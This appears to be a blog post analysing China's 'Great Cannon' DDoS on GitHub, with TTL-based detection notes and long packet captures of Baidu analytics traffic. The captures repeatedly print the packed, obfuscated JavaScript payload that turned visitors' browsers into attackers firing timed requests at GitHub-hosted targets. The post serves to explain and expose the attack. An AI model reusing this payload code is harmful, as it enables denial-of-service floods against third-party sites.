Great Cannon of China Man-on-the-side DDoS Attack – Actual Traffic and Analysis

December 23, 2017 by  Filed under: Computer 
 

China can DDoS any website in the world with their great cannon. They used China’s largest search engine to take down multiple websites at the same time barely trying. Could this be what World War III looks like? A Cyber War?

So by now everyone has heard of China’s Great Cannon DDoS attack on GITHUB and other targets, but how did they do it? If you look at the traffic below you will see queries to a legit website hosted in China, more specifically in our example because we did not want to be part of attacking New York Times or Github we queried Baidu itself for their Javascript tracking code. This is just like with Google Analytics where websites insert the code to track users activities, actions, referral pages and so on. However, you’ll see every so queries this:

“send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou”

And this is state sponsored China hostile activity at its worst, legitimate users landing on a China website using Baidu’s tracking code (Baidu being the largest by far Search Engine in China) are parsing this Javascript which tells the users browser to open connections to the targets. Researchers at Sweden-based Netresec analyzed the technical fingerprints of the malicious JavaScript and found they are different from the remainder of the non-malicious traffic received by the one percent of computers conscripted into the DDoS army. For instance, the time to live limits placed on how long packets should be accepted by end-user computers are vastly different for the malicious content—from 30 to 229 compared with 42 for legitimate analytics code. The Netresec researchers also tried blocking one of the malicious packets so that a request would be made to the originating server for the packets to be resent. The requests were ignored. Both observations are consistent with the DDoS code being inserted by someone other than the websites using the Baidu analytics service.

Netresec could clearly identify that a man-in-the-middle was happening by looking at the TTL fields in the packets. TTL, or time-to-live, is a field in all Internet packets that tracks the age of the packet. Each time a router forwards a packet, one is subtracted from the field. When it reaches zero, the packet is discarded. This prevents routing loops from endlessly forwarding packets around in circle.

Many systems send packets with a starting TTL of 64. Thus, when a packet arrives with a value of 46, you know that that there are 18 hops between you and the sender (64 – 18 = 46).

 

 

Here is our converted PCAP traffic sample of what was happening:

 

2015-04-03 11:41:16.361127 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192E…0:..@..V….{}s.y..P…eX.H^P. …..GET /a.js HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: eclick.baidu.comConnection: Keep-Alive2015-04-03 11:41:16.722461 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:108(107) ack 119 win 767E….X…..B{}s……Py.X.H^….P…….HTTP/1.1 200 OKServer: ApacheConnection: closeContent-Type: text/javascriptContent-Length: 11302015-04-03 11:41:16.722866 IP 123.125.115.164.80 > 192.150.187.17.31161: P 108:1132(1024) ack 1 win 768E..(…….H{}s……Py.X.H….eP….W..eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘l.k(“<5 p=’r://H.B.9/8/2.0.0/8.C.t’>\h/5>”);!J.K&&l.k(“<5 p=’r://L.8.9/8-T.t’>\h/5>”);j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[“m://n.9/E”,”m://n.9/F-G”];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:”5″,P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v(“e()”,a)}v(“e()”,D);’,62,64,’|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou2015-04-03 11:41:16.722884 IP 123.125.115.164.80 > 192.150.187.17.31161: FP 1132:1238(106) ack 1 win 769E………..{}s……Py.X.L….eP…(…t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours’.split(‘|’),0,{}))

2015-04-03 11:41:17.386631 IP 192.150.187.17.31161 > 123.125.115.164.80: P 1:119(118) ack 1 win 8192E…0:..@..V….{}s.y..P…eX.H^P. …..GET /a.js HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: eclick.baidu.comConnection: Keep-Alive2015-04-03 11:41:17.774049 IP 123.125.115.164.80 > 192.150.187.17.31161: . ack 119 win 14600E..(.O@.,…{}s……Py.X.H^….P.9………..2015-04-03 11:41:17.774467 IP 123.125.115.164.80 > 192.150.187.17.31161: P 1:312(311) ack 119 win 14600E.._.P@.,…{}s……Py.X.H^….P.9..A..HTTP/1.1 200 OKServer: nginxDate: Fri, 03 Apr 2015 15:41:17 GMTContent-Type: application/x-javascriptContent-Length: 0Last-Modified: Fri, 03 Apr 2015 08:55:28 GMTConnection: keep-aliveETag: “551e5580-0″Expires: Fri, 03 Apr 2015 16:41:17 GMTCache-Control: max-age=3600Accept-Ranges: bytes

2015-04-03 16:56:49.500107 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993609:3993609(0) win 8192E..(……lJ….{}AxN .P.<. ….P. …..2015-04-03 16:56:49.513486 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 10033422 win 8192E..(……lJ….{}AxN .P.<…..P. …..2015-04-03 16:56:49.521300 IP 192.150.187.17.20000 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F……k+….{}AxN .P.<…..P. .Z…GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:56:49.529089 IP 192.150.187.17.20000 > 123.125.65.120.80: S 3993896:3993896(0) win 8192E..(……lH….{}AxN .P.<.(….P. ..p..2015-04-03 16:56:49.537135 IP 192.150.187.17.20000 > 123.125.65.120.80: . ack 1 win 8192E..(……lH….{}AxN .P.<.)….P. …..2015-04-03 16:56:49.545312 IP 192.150.187.17.20000 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E………k…..{}AxN .P.<.)….P. .P1..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive2015-04-03 16:56:49.553116 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314055:17314055(0) win 8192E..(……lF….{}AxN!.P..1…..P. …..2015-04-03 16:56:49.561119 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 21433245 win 8192E..(……lF….{}AxN!.P..1..G..P. …..2015-04-03 16:56:49.569559 IP 192.150.187.17.20001 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F……k’….{}AxN!.P..1..G..P. .%…GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:56:49.577146 IP 192.150.187.17.20001 > 123.125.65.120.80: S 17314342:17314342(0) win 8192E..(……lD….{}AxN!.P..2&….P. …..2015-04-03 16:56:49.585074 IP 192.150.187.17.20001 > 123.125.65.120.80: . ack 1 win 8192E..(……lD….{}AxN!.P..2′.G..P. …..2015-04-03 16:56:49.593233 IP 192.150.187.17.20001 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E………k…..{}AxN!.P..2′.G..P. ..*..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive

2015-04-03 16:56:49.702218 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615002:615002(0) win 8192E..(……l:….{}AxN$.P. bZ….P. ..m..2015-04-03 16:56:49.709823 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 29776619 win 8192E..(……l:….{}AxN$.P. b[..Z.P. .I…2015-04-03 16:56:49.718088 IP 192.150.187.17.20004 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F……k…..{}AxN$.P. b[..Z.P. ..^..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:56:49.725818 IP 192.150.187.17.20004 > 123.125.65.120.80: S 615289:615289(0) win 8192E..(……l8….{}AxN$.P. cy….P. ..N..2015-04-03 16:56:49.737804 IP 192.150.187.17.20004 > 123.125.65.120.80: . ack 1 win 8192E..(……l8….{}AxN$.P. cz..Z.P. .H…2015-04-03 16:56:49.746030 IP 192.150.187.17.20004 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E………k…..{}AxN$.P. cz..Z.P. …..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive2015-04-03 16:56:49.753793 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124395:23124395(0) win 8192E..(……l6….{}AxN%.P.`……P. .-…2015-04-03 16:56:49.761856 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 31158638 win 8192E..(……l6….{}AxN%.P.`….qnP. ..k..2015-04-03 16:56:49.770528 IP 192.150.187.17.20005 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F……k…..{}AxN%.P.`….qnP. …..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:56:49.777836 IP 192.150.187.17.20005 > 123.125.65.120.80: S 23124682:23124682(0) win 8192E..(……l4….{}AxN%.P.`……P. .,…2015-04-03 16:56:49.785806 IP 192.150.187.17.20005 > 123.125.65.120.80: . ack 1 win 8192E..(……l4….{}AxN%.P.`….qnP. ..L..2015-04-03 16:56:49.794034 IP 192.150.187.17.20005 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E………k…..{}AxN%.P.`….qnP. …..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive

2015-04-03 16:56:52.394059 IP 192.150.187.17.20058 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192.P. …..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:56:52.400648 IP 123.125.65.120.80 > 192.150.187.17.20054: S 1636608291:1636608291(0) ack 2549121 win 2937E..(l.@…+.{}Ax…..PNVa..#.&..P..y,………2015-04-03 16:56:52.401820 IP 192.150.187.17.20058 > 123.125.65.120.80: S 16946615:16946615(0) win 8192E..(……k`….{}AxNZ.P……..P. .q…2015-04-03 16:56:52.409800 IP 192.150.187.17.20058 > 123.125.65.120.80: . ack 1 win 8192.P. .b….k`….{}AxNZ.P……2015-04-03 16:56:52.411115 IP 123.125.65.120.80 > 192.150.187.17.20054: R 2668727381:2668727381(0) ack 1 win 2941E..(m.@…(3{}Ax…..PNV..5x.&..P..}.R……..2015-04-03 16:56:52.418085 IP 192.150.187.17.20058 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192.P. …..GET /?falun HTTP/1.1.User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive

2015-04-03 16:57:03.022068 IP 192.150.187.17.20274 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F.2….f…..{}AxO2.P.N…HsWP. …..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:57:03.024429 IP 123.125.65.120.80 > 192.150.187.17.20270: S 2758833337:2758833337(0) ack 5647123 win 486E..(..@.w…{}Ax…..PO..pt..V+.P….=……..2015-04-03 16:57:03.029860 IP 192.150.187.17.20274 > 123.125.65.120.80: S 5112257:5112257(0) win 8192E..(.3….h…..{}AxO2.P.N……P. …..2015-04-03 16:57:03.030160 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041284:1555041284(0) ack 1 win 490E..(.|@.y…{}Ax…..PO.. …V+.P…x………2015-04-03 16:57:03.037899 IP 192.150.187.17.20274 > 123.125.65.120.80: . ack 1 win 8192E..(.3….h…..{}AxO2.P.N…HsWP. …..2015-04-03 16:57:03.038698 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041284:1555041391(107) ack 287 win 820E…….6.u.{}Ax…..PO.. …V,1P..4….HTTP/1.1 200 OKServer: ApacheConnection: closeContent-Type: text/javascriptContent-Length: 11302015-04-03 16:57:03.039348 IP 123.125.65.120.80 > 192.150.187.17.20270: P 1555041391:1555042415(1024) ack 1 win 821E..(.i..7.n.{}Ax…..PO.. .(.V+.P..5….eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘l.k(“<5 p=’r://H.B.9/8/2.0.0/8.C.t’>\h/5>”);!J.K&&l.k(“<5 p=’r://L.8.9/8-T.t’>\h/5>”);j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[“m://n.9/E”,”m://n.9/F-G”];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:”5″,P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v(“e()”,a)}v(“e()”,D);’,62,64,’|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou2015-04-03 16:57:03.039388 IP 123.125.65.120.80 > 192.150.187.17.20270: FP 1555042415:1555042521(106) ack 1 win 822E….u..8.qS{}Ax…..PO.. .(.V+.P..6yK..t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours’.split(‘|’),0,{}))

2015-04-03 16:57:03.039395 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555041391:1555041391(0) ack 287 win 489E..(..@.z…{}Ax…..PO.. .(.V,1P…v………2015-04-03 16:57:03.039399 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042521:1555042521(0) ack 1 win 491E..(.{@.|…{}Ax…..PO.. …V+.P…s………2015-04-03 16:57:03.039402 IP 123.125.65.120.80 > 192.150.187.17.20270: R 1555042415:1555042415(0) ack 1 win 493E..(..@.~..8{}Ax…..PO.. .(.V+.P…t………2015-04-03 16:57:03.045725 IP 123.125.65.120.80 > 192.150.187.17.20270: S 1237632748:1237632748(0) ack 5647410 win 495E..(..@….K{}Ax…..PO.I….V,2P………….2015-04-03 16:57:03.047090 IP 192.150.187.17.20274 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E….4….g…..{}AxO2.P.N…HsWP. ..|..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive2015-04-03 16:57:06.966079 IP 192.150.187.17.20354 > 123.125.65.120.80: P 0:286(286) ack 1 win 8192E..F r….e…..{}AxO..P…..Z.gP. ..w..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:57:06.973800 IP 192.150.187.17.20354 > 123.125.65.120.80: S 830702:830702(0) win 8192E..( s….f…..{}AxO..P……..P. .Zx..2015-04-03 16:57:06.974083 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351077:1119351077(0) ack 1 win 1381E..(..@…..{}Ax…..PO~……o.P..e……….2015-04-03 16:57:06.982296 IP 192.150.187.17.20354 > 123.125.65.120.80: . ack 1 win 8192E..( s….f…..{}AxO..P…..Z.gP. .d…2015-04-03 16:57:06.984590 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351077:1119351184(107) ack 287 win 823E…….9.r.{}Ax…..PO~……p.P..7<…HTTP/1.1 200 OKServer: ApacheConnection: closeContent-Type: text/javascriptContent-Length: 11302015-04-03 16:57:06.984925 IP 123.125.65.120.80 > 192.150.187.17.20350: P 1119351184:1119352208(1024) ack 1 win 824E..(.y..:.m.{}Ax…..PO~……o.P..8E…eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘l.k(“<5 p=’r://H.B.9/8/2.0.0/8.C.t’>\h/5>”);!J.K&&l.k(“<5 p=’r://L.8.9/8-T.t’>\h/5>”);j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[“m://n.9/E”,”m://n.9/F-G”];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:”5″,P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v(“e()”,a)}v(“e()”,D);’,62,64,’|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou2015-04-03 16:57:06.984954 IP 123.125.65.120.80 > 192.150.187.17.20350: FP 1119352208:1119352314(106) ack 1 win 825..t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours’.split(‘|’),0,{}))

2015-04-03 16:57:06.985905 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119351184:1119351184(0) ack 287 win 1384E..(..@….:{}Ax…..PO~……p.P..h.B……..2015-04-03 16:57:06.985926 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352208:1119352208(0) ack 1 win 1386E..(.3@…..{}Ax…..PO~……o.P..j.^……..2015-04-03 16:57:06.985930 IP 123.125.65.120.80 > 192.150.187.17.20350: R 1119352314:1119352314(0) ack 1 win 1388E..(..@….j{}Ax…..PO~……o.P..l……….2015-04-03 16:57:06.990088 IP 192.150.187.17.20354 > 123.125.65.120.80: P 287:405(118) ack 1 win 8192E… t….fI….{}AxO..P…..Z.gP. …..GET /?falun HTTP/1.1User-Agent: Wget/1.15 (linux-gnu)Accept: */*Host: www.google.comConnection: Keep-Alive

2015-04-03 16:17:08.842143 IP 192.150.187.32.11010 > 123.125.65.120.80: P 26809681:26809967(286) ack 5633851 win 8192E..F.*..@.@…. {}Ax+..P…Q.U.;P. .y…GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 16:17:08.846541 IP 123.125.65.120.80 > 192.150.187.32.11003: P 1:108(107) ack 286 win 2476E….+..l…{}Ax… .P*..|.5.q..P. .Z…HTTP/1.1 200 OKServer: ApacheConnection: closeContent-Type: text/javascriptContent-Length: 11302015-04-03 16:17:08.846955 IP 123.125.65.120.80 > 192.150.187.32.11003: P 108:1132(1024) ack 0 win 2477E..(….m…{}Ax… .P*..|…q..P. .d…eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘l.k(“<5 p=’r://H.B.9/8/2.0.0/8.C.t’>\h/5>”);!J.K&&l.k(“<5 p=’r://L.8.9/8-T.t’>\h/5>”);j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[“m://n.9/E”,”m://n.9/F-G”];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:”5″,P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v(“e()”,a)}v(“e()”,D);’,62,64,’|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou2015-04-03 16:17:08.846997 IP 123.125.65.120.80 > 192.150.187.32.11003: FP 1132:1238(106) ack 0 win 2478E…….n…{}Ax… .P*..|…q..P. ..Z..t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours’.split(‘|’),0,{}))

2015-04-03 16:17:08.850152 IP 192.150.187.14.11010 > 123.125.65.120.80: P 12182551:12182837(286) ack 27010254 win 8192E..F.+..@.@…..{}Ax+..P……$.P. .|^..GET /js/o.js HTTP/1.1Host: cbjs.baidu.comUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://www.guokr.com/article/437015/Connection: keep-alive2015-04-03 12:58:37.676811 IP 123.125.65.120.80 > 192.150.187.17.19487: P 1:108(107) ack 286 win 704E….Q…..v{}Ax…..PL..Z@..y.XP…….HTTP/1.1 200 OKServer: ApacheConnection: closeContent-Type: text/javascriptContent-Length: 11302015-04-03 12:58:37.677098 IP 123.125.65.120.80 > 192.150.187.17.19487: P 108:1132(1024) ack 0 win 705E..(.X……{}Ax…..PL..Z@..y.:P….)..eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘l.k(“<5 p=’r://H.B.9/8/2.0.0/8.C.t’>\h/5>”);!J.K&&l.k(“<5 p=’r://L.8.9/8-T.t’>\h/5>”);j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=[“m://n.9/E”,”m://n.9/F-G”];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:”5″,P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v(“e()”,a)}v(“e()”,D);’,62,64,’|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeou2015-04-03 12:58:37.677131 IP 123.125.65.120.80 > 192.150.187.17.19487: FP 1132:1238(106) ack 0 win 706E……….#{}Ax…..PL..ZD..y.:P…Tx..t|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours’.split(‘|’),0,{}))

2015-04-03 12:58:37.690143 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL!….3…..{}AxL .P.X.4.#..P. …..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.698336 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL”….3…..{}AxL!.P..l..$.eP. .H ..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.706121 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL#….3…..{}AxL”.P..i}.,c.P. …..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.714311 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL$….3…..{}AxL#.P.f…^..P. ..y..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.746264 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL’….3…..{}AxL&.P.b…iSP. …..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.758229 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL)….3…..{}AxL(.P…e..~.P. …..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.766636 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL*….3…..{}AxL).P.Q……P. .qU..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.774319 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL+….3…..{}AxL*.P..!J.^..P. .^j..GET /js/o.js HTTP/1.1Host:2015-04-03 12:58:37.782302 IP 124.65.194.54 > 192.150.187.17: ICMP time exceeded in-transit, length 76E..`……..|A.6…….`….E..FL,….3…..{}AxL+.P..1..%.P. …..GET /js/o.js HTTP/1.1Host:

Speak Your Mind

Tell us what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!


You must be logged in to post a comment.

Prev Post:
Next Post: